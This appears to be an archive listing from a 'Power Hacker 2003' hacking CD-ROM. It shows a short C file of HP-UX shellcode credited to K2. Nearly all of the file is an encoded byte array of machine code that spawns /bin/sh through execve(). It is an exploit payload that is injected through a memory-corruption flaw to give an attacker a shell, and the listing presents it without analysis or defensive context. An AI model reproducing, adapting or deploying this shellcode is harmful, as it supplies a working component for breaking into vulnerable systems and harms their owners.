home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hack.co.za / shellcode / hp-ux / execve_binsh.c next >
Encoding:
Text File  |  2000-09-14  |  317 b   |  10 lines

  1. /*
  2.  *  Hp-Ux
  3.  *  
  4.  *  execve() of /bin/sh by K2
  5.  */
  6.  
  7. u_char shellcode[] =
  8.   "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
  9.   "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
  10.   "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";